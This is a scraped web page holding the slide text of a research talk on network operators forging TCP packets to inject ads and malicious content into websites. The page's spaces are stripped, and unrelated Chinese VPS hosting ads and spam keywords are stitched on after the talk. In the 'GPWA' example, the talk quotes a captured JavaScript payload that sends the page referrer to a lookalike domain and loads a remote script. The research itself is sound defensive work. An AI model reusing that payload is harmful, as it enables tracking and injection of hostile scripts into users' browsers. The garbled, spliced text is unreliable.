Refereracceptencoding

acceptencoding  时间:2021-05-22  阅读:()
WEBSITE-TARGETEDFALSECONTENTINJECTIONBYNETWORKOPERATORSGabiNakibly1,2,JaimeSchcolnik3andYossiRubin21Technion–IsraelInstituteoftechnology2Rafael–AdvancedDefenseSystemsltd.
3IDCHerzliyaKNOWNEVENTSOFWEBCONTENTALTERATIONSomeISPsinthepasthavebeenspottedalteringtheircustomers'traffic:CMACommunicationsin2013Comcastin2012Mediacomin2011WOW!
in2008….
RogueadvertisementHOWTHEPRACTICEOFCONTENTALTERATIONWASSTUDIEDSeveralworksstudiedandanalyzedthispracticeE.
g.
NetalyzrHowpastworkmonitoredtraffictounearthcontentalterations:HOWTRAFFICWASMONITOREDINOURSTUDYWHATISOUT-OF-BANDCONTENTALTERATIONIn-bandcontentalteration:Out-of-bandcontentalteration:OUT-OF-BANDINJECTION–MODUSOPERANDI250bytessq#=0100bytessq#=250150bytessq#=350ourmonitoringpoint150bytessq#=350OUT-OF-BANDINJECTIONDETECTIONForgedbytessq#=350Validbytessq#=350TCPinjectionhasoccurrediftherearetwopacketsthathave:IdenticalIPaddressesandportnumbers,IdenticalTCPsequencenumber,But,havedifferentpayload.
THEINJECTIONEVENTSWediscovered14differentgroupsofinjectionevents.
AlmostallofthemwereinjectionstoChinesewebsites.
7injectiongroupsaimedtoaddrogueadvertisementstothewebsite.
5ofinjectiongroupshassomesortofmaliciousintent.
2injectiongroupsaimedtosimplyblockcontent(howeverisitnotcensorshiprelated).
INJECTIONEXAMPLE#1Thisinjectiongroupaimstoinjectrogueadvertisements.
Thisistheclient'sHTTPrequest:GET/core.
phpshow=pic&t=zHTTP/1.
1User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)Host:c.
cnzz.
comAccept-Encoding:gzipReferer:http://tfkp.
com/INJECTIONEXAMPLE#1(CONT.
)ThevalidHTTPresponse:TheinjectedHTTPresponse:HTTP/1.
1200OKServer:TengineContent-Type:application/javascriptContent-Length:762Connection:keep-aliveDate:Tue,07Jul201504:54:08GMTLast-Modified:Tue,07Jul201504:54:08GMTExpires:Tue,07Jul201505:09:08GMT!
function(){varp,q,r,a=encodeURIComponent,c=.
.
.
HTTP/1.
1302FoundConnection:closeContent-Length:0Location:http://adcpc.
899j.
com/google/google.
jsINJECTIONEXAMPLE#2ThevalidHTTPresponse:HTTP/1.
1200OKServer:nginx/1.
4.
4Content-Type:text/javascript;charset=UTF-8Transfer-Encoding:chunkedVary:Accept-EncodingExpires:-1Cache-Control:no-store,private,post-check=0…Pragma:no-cacheP3P:CP="CURaADMaDEVaPSAoPSDoOURBUSUNIINT….
JiaTag:de2a570993d722c94……Content-Encoding:gzipTheforgedHTTPresponse:HTTP/1.
1200OKDate:May,28Mar201214:59:17GMTServer:Microsoft-IIS/6.
0X-Powered-By:ASP.
NETPragma:No-CacheContent-Length:145Cache-control:no-cacheJiaThisisaChinesecompanythatprovidesasocialsharingtoolbar.
Arequestforaresourceatjiathis.
comresultsinthefollowing:AredirectiontoBaiduwithsearchterm"UNIQLO"'GPWA'INJECTION'GPWA'INJECTIONGPWA–GamblingPortalWebmastersAssociation.
Itrunsacertificationprogramtogamblingsites.
AsitethatmeetsthecertificationstandardgetstoshowanGPWAseal.
Thereareabout2500GPWAapprovedgamblingsites.
http://certify.
gpwa.
org/seal/online.
casinocity.
com/'GPWA'INJECTIONTheclient'sHTTPrequestis:GET/script/europeansoccerstatistics.
com/HTTP/1.
1Host:certify.
gpwa.
orgConnection:keep-aliveAccept:*/*User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)AppleWebKit/537.
36(KHTML,likeGecko)Chrome/44.
0.
2403.
107Safari/537.
36Referer:http://europeansoccerstatistics.
com/Accept-Encoding:gzip,deflate,sdchAccept-Language:en-US,en;q=0.
8,he;q=0.
6'GPWA'INJECTION(CONT.
)Theinjectedresource.
Referstoqpwa.
orginsteadofgpwa.
org.
Thisisnotanattackbyanetworkoperator,butbyathirdpartywhoprobablycompromisedarouter.
Thevictimsoftheattackhasreportedlyhavebeenshownadsandspoofedaffiliatetags.
{vari=newImage();i.
src="http://qpwa.
org/q="+document.
referrer;l=localStorage;if((document.
referrer!
="")&&(document.
location.
hostname!
=document.
referrer.
split('/')[2])&&(!
l.
g)){c=document.
createElement('script');c.
src='http://certify.
qpwa.
org/script/'+document.
location.
hostname.
replace('www\.
','')+'/';document.
getElementsByTagName('head')[0].
appendChild(c)}l.
g=1;}WHOISBEHINDTHEINJECTIONSIngeneral,itisdifficulttounveiltheinjectingentitiesasthereisnoidentifyinginformationintheinjectedcontent.
wetriedtogetanindicationoftheiridentitybyidentifyingtheautonomoussystemfromwhichtheforgedpacketoriginated.
Sincetheinjectionswerenotreproducible,wecannotemploytheoft-usedtraceroute-likeproceduretolocatetheinjector.
WHOISBEHINDTHEINJECTIONS(CONT.
)Weusedaheuristicbasedontheforgedpacket'sIPTTLtotrackdownitssource.
ItisknownthatthedefaultinitialTTLvaluesofthemajoroperatingsystemsare32,64,128and255.
Iftheattackerusedoneofthosevalueswecancalculatehowmanyhopstheinjectedpackettraversed.
Forexample,ifaninjectedpacketarrivedattheclienthavingTTL=59,thenmostprobablyit'sinitialvaluewas64andittraversed5hops.
Giventhepathbetweentheserverandtheclientwecanpin-pointtheinjector'slocation.
ServerClientEstimatednumberofhopstraversedbytheforgedpacketPATHDETECTIONUSINGRIPEATLASHowever,wedonotknowwhatistheactualpathfromthewebservertotheuser.
Thereversepath(clienttoserver)canbetrace-routed,butInternetpathsarenotalwayssymmetric.
TosolvethisproblemweleveragedRIPEAtlas:AglobalnetworkofprobesthatmeasureInternetconnectivityandreachability.
UsingRIPEAtlaswetraceroutedthepathfromanodeintheASofthewebservertotheclient(whenthereisone).
Thisisstillanapproximationsincethatnodeinnottheactualwebserver.
THESUSPICIOUSAUTONOMOUSSYSTEMSOuranalysisindicatesthattheinjectorresideswithintheASoftheinjectedwebsite.
Usually2-5hopsawayfromthewebserver.
MostinjectionsaretriggeredfromChineseoperators.
CONCLUSIONSFollowingalarge-scalesurveyofInternettrafficwediscoveredthatnotonlyedgeISPsaltertrafficbutalsonon-edgenetworkoperatorsthataimtoincreasetheirrevenue.
Therewerenumerousincidentswithmaliciousintent.
Weproposeaclient-sidemitigationfortheattacksincaseHTTPScannotbeused.
Wepublishedsamplesoftheinjections.

Sparkedhost($8/月)美国迈阿密AMD Ryzen高性能VPS;免费100G高防

sparkedhost怎么样?sparkedhost主机。Sparkedhost于2017年7月注册在美国康涅狄格州,2018年收购了ClynexHost,2019年8月从Taltum Solutions SL收购了The Beast Hosting,同年10月从Reilly Bauer收购了OptNode Hosting。sparkedhost当前的业务主要为:为游戏“我的世界”提供服务器、虚拟...

提速啦(69元起)香港大带宽CN2+BGP独享云服务器

香港大带宽服务器香港大带宽云服务器目前市场上可以选择的商家十分少,这次给大家推荐的是我们的老便宜提速啦的香港大带宽云服务器,默认通用BGP线路(即CN2+BGP)是由三网直连线路 中国电信骨干网以及HGC、NTT、PCCW等国际线路混合而成的高品质带宽(精品带宽)线路,可有效覆盖全球200多个国家和地区。(适用于绝大部分应用场景,适合国内外访客访问,域名无需备案)提速啦官网链接:点击进入香港Cer...

totyun:香港cn2 vps,5折优惠,$6/月,10Mbps带宽,不限流量,2G内存/2核/20g+50g

totyun,新公司,主要运作香港vps、日本vps业务,接入cn2网络,不限制流量!VPS基于KVM虚拟,采用系统盘和数据盘分离,从4G内存开始支持Windows系统...大家注意下,网络分“Premium China”、“Global”,由于站长尚未测试,所以也还不清楚情况,有喜欢吃螃蟹的尝试过不妨告诉下站长。官方网站:https://totyun.com一次性5折优惠码:X4QTYVNB3P...

acceptencoding为你推荐
2019年全国职业院校技能大赛Source163菏泽市牡丹区实验小学计划ipad支持ipad支持ipad支持ipad重庆宽带测速重庆电信测速我的网速溢出win10关闭445端口如何进入注册表修改关闭445端口iphone连不上wifi为什么苹果手机连不上wifi微信都发不出去?
免费网站域名注册 vps代理 已备案域名出售 GGC hkbn hostmonster cpanel主机 远程登陆工具 小米数据库 微信收钱 腾讯云分析 nerds tna官网 cxz 免费asp空间申请 德讯 免备案jsp空间 restart hosting cloudflare 更多